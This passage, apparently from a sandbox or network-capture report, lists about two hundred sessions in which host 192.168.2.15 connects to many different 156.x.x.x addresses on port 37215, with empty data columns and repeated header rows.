                                                                            27396192.168.2.1552152156.253.111.13637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27397192.168.2.1538122156.249.35.5337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27398192.168.2.1560006156.115.33.18337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27399192.168.2.1540454156.50.164.22237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27400192.168.2.1555502156.184.185.5337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27401192.168.2.1558764156.78.44.16237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27402192.168.2.1542594156.191.63.1337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27403192.168.2.1533636156.142.2.4037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27404192.168.2.1536626156.165.156.19637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27405192.168.2.1553992156.205.138.21537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27406192.168.2.1547892156.249.102.1737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27407192.168.2.1552180156.11.6.8537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27408192.168.2.1552320156.22.57.7737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27409192.168.2.1556512156.247.94.2237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27410192.168.2.1534960156.40.64.11437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27411192.168.2.1536420156.75.153.8537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27412192.168.2.1536458156.160.150.3237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27413192.168.2.1553116156.79.127.19237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27414192.168.2.1533710156.78.155.15737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27415192.168.2.1536820156.22.38.1137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27416192.168.2.1545714156.243.17.037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27417192.168.2.1538372156.32.133.9437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27418192.168.2.1554244156.56.14.6837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27419192.168.2.1545920156.26.231.19037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27420192.168.2.1551454156.126.244.837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27421192.168.2.1551424156.158.173.11337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27422192.168.2.1545950156.119.172.23137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27423192.168.2.1558336156.158.223.24137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27424192.168.2.1554526156.76.77.23037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27425192.168.2.1545812156.24.141.137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27426192.168.2.1549784156.131.81.137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27427192.168.2.1540542156.137.112.14337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27428192.168.2.1537410156.92.62.10437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27429192.168.2.1553684156.43.88.20637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27430192.168.2.1560868156.152.18.21837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27431192.168.2.1548410156.97.249.21537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27432192.168.2.1560876156.152.140.17337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27433192.168.2.1548116156.20.175.7137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27434192.168.2.1543280156.71.32.20737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27435192.168.2.1548040156.182.97.837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27436192.168.2.1539992156.172.178.24437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27437192.168.2.1551512156.26.40.16537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27438192.168.2.1551112156.3.175.15337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27439192.168.2.1558898156.62.108.14637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27440192.168.2.1555796156.149.141.7837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27441192.168.2.1545078156.122.239.11437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27442192.168.2.1558614156.110.34.437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27443192.168.2.1542662156.79.83.13437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27444192.168.2.1540518156.128.64.2337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27445192.168.2.1548200156.207.105.12937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27446192.168.2.1542292156.240.142.137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27447192.168.2.1535120156.184.183.13937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27448192.168.2.1548014156.167.104.137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27449192.168.2.1541762156.78.92.13437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27450192.168.2.1546346156.221.216.14337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27451192.168.2.1534708156.116.190.11437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27452192.168.2.1546614156.6.217.16737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27453192.168.2.1554686156.208.120.937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27454192.168.2.1549556156.98.211.3637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27455192.168.2.1543860156.16.2.13137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27456192.168.2.1533130156.89.228.17937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27457192.168.2.1541462156.33.219.14137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27458192.168.2.1537112156.214.17.21637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27459192.168.2.1533498156.208.199.11037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27460192.168.2.1534470156.1.172.9037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27461192.168.2.1556904156.7.126.1737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27462192.168.2.1553062156.195.13.12737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27463192.168.2.1543030156.68.137.13837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27464192.168.2.1547840156.45.106.17737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27465192.168.2.1554264156.76.37.17637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27466192.168.2.1535576156.28.207.18637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27467192.168.2.1540798156.105.37.20337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27468192.168.2.1540060156.232.232.16937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27469192.168.2.1549902156.208.67.8737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27470192.168.2.1535738156.163.3.5937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27471192.168.2.1549748156.51.65.18737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27472192.168.2.1555126156.132.49.237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27473192.168.2.1548976156.34.85.18737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27474192.168.2.1553984156.59.185.13237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27475192.168.2.1544612156.22.31.25437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27476192.168.2.1550258156.8.225.337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27477192.168.2.1549272156.86.243.14037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27478192.168.2.1543260156.212.91.15637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27479192.168.2.1540984156.209.35.23637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27480192.168.2.1556842156.136.8.15037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27481192.168.2.1540978156.111.34.11537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27482192.168.2.1544618156.32.222.237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27483192.168.2.1550604156.44.192.22337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27484192.168.2.1557438156.157.213.7937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27485192.168.2.1536302156.174.133.10937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27486192.168.2.1553162156.117.110.9437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27487192.168.2.1560140156.241.171.10037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27488192.168.2.1559694156.50.54.25137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27489192.168.2.1542796156.231.46.14237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27490192.168.2.1560470156.119.80.5337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27491192.168.2.1534278156.76.95.16637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27492192.168.2.1558712156.196.220.9937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27493192.168.2.1537894156.64.201.1737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27494192.168.2.1554530156.54.131.937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27495192.168.2.1533126156.243.56.19837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27496192.168.2.1536786156.168.140.24837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27497192.168.2.1541060156.215.70.3837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27498192.168.2.1553718156.91.220.6837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27499192.168.2.1541142156.96.239.10337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27500192.168.2.1551690156.99.142.6637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27501192.168.2.1534042156.123.245.6437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27502192.168.2.1535640156.9.218.15237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27503192.168.2.1558382156.255.162.13137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27504192.168.2.1560294156.253.43.22437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27505192.168.2.1539370156.78.231.11337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27506192.168.2.1533170156.78.83.18937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27507192.168.2.1556370156.163.244.137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27508192.168.2.1554038156.254.227.12237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27509192.168.2.1543588156.72.75.12337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27510192.168.2.1551444156.233.90.8837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27511192.168.2.1542388156.175.98.13337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27512192.168.2.1558550156.25.18.22937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27513192.168.2.1555322156.220.3.1637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27514192.168.2.1558984156.253.167.25437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27515192.168.2.1536300156.9.217.9437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27516192.168.2.1557086156.53.30.8837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27517192.168.2.1534026156.90.178.14937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27518192.168.2.1554694156.38.6.737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27519192.168.2.1552118156.141.168.18337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27520192.168.2.1540806156.210.127.15537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27521192.168.2.1544460156.202.154.5437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27522192.168.2.1539496156.67.74.8437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27523192.168.2.1534040156.46.172.5937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27524192.168.2.1539188156.124.205.25037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27525192.168.2.1551716156.9.177.937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27526192.168.2.1554810156.64.69.11437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27527192.168.2.1559552156.157.22.10637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27528192.168.2.1548756156.148.33.24837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27529192.168.2.1559546156.155.20.6837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27530192.168.2.1534114156.239.83.1437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27531192.168.2.1544474156.94.23.13537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27532192.168.2.1557538156.186.238.7237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27533192.168.2.1560294156.36.226.337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27534192.168.2.1549464156.48.66.5437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27535192.168.2.1534422156.232.255.10237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27536192.168.2.1557030156.36.4.23437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27537192.168.2.1538280156.213.68.20637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27538192.168.2.1547416156.244.146.18537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27539192.168.2.1540886156.85.247.837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27540192.168.2.1534438156.253.251.9137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27541192.168.2.1543128156.184.24.14337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27542192.168.2.1541160156.28.185.15437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27543192.168.2.1547262156.248.181.8637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27544192.168.2.1554644156.2.34.15637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27545192.168.2.1540548156.103.161.19137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27546192.168.2.1553678156.198.114.10837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27547192.168.2.1546706156.230.176.7037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27548192.168.2.1557746156.135.43.11737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27549192.168.2.1557796156.73.49.9237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27550192.168.2.1534254156.127.20.5837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27551192.168.2.1548888156.244.142.21737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27552192.168.2.1551200156.181.176.19737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27553192.168.2.1559874156.49.204.14637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27554192.168.2.1542118156.178.77.20837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27555192.168.2.1533880156.12.135.2737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27556192.168.2.1558202156.208.53.6637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27557192.168.2.1546260156.30.79.11537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27558192.168.2.1539052156.62.208.1337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27559192.168.2.1539848156.173.226.8937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27560192.168.2.1533550156.40.247.14937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27561192.168.2.1536194156.189.116.4737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27562192.168.2.1543652156.83.167.17037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27563192.168.2.1551940156.204.103.19237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27564192.168.2.1545212156.241.12.25437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27565192.168.2.1554234156.150.146.19937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27566192.168.2.1546840156.148.92.23137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27567192.168.2.1560104156.106.123.19637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27568192.168.2.1550350156.98.4.11837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27569192.168.2.1549404156.188.251.17537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27570192.168.2.1560494156.41.158.18037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27571192.168.2.1534096156.143.180.16937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27572192.168.2.1557760156.170.13.2537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27573192.168.2.1557354156.167.217.22337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27574192.168.2.1560114156.222.172.17337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27575192.168.2.1555790156.108.125.21737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27576192.168.2.1552814156.57.237.1437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27577192.168.2.1535262156.99.14.10737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27578192.168.2.1558172156.98.30.4337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27579192.168.2.1541112156.2.0.3837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27580192.168.2.1542288156.216.39.14537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27581192.168.2.1544472156.34.135.13037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27582192.168.2.1548724156.72.244.15837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27583192.168.2.1537070156.118.133.7937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27584192.168.2.1555490156.252.81.24237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27585192.168.2.1550364156.15.103.5537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27586192.168.2.1539582156.152.111.8537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27587192.168.2.1543848156.126.11.3237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27588192.168.2.1542088156.181.92.4537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27589192.168.2.1557186156.55.168.4437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27590192.168.2.1536756156.22.94.9337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27591192.168.2.1557068156.170.208.22637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27592192.168.2.1544568156.172.19.21337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27593192.168.2.1553232156.7.113.23037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27594192.168.2.1545750156.110.124.5037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27595192.168.2.1551870156.87.204.12637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
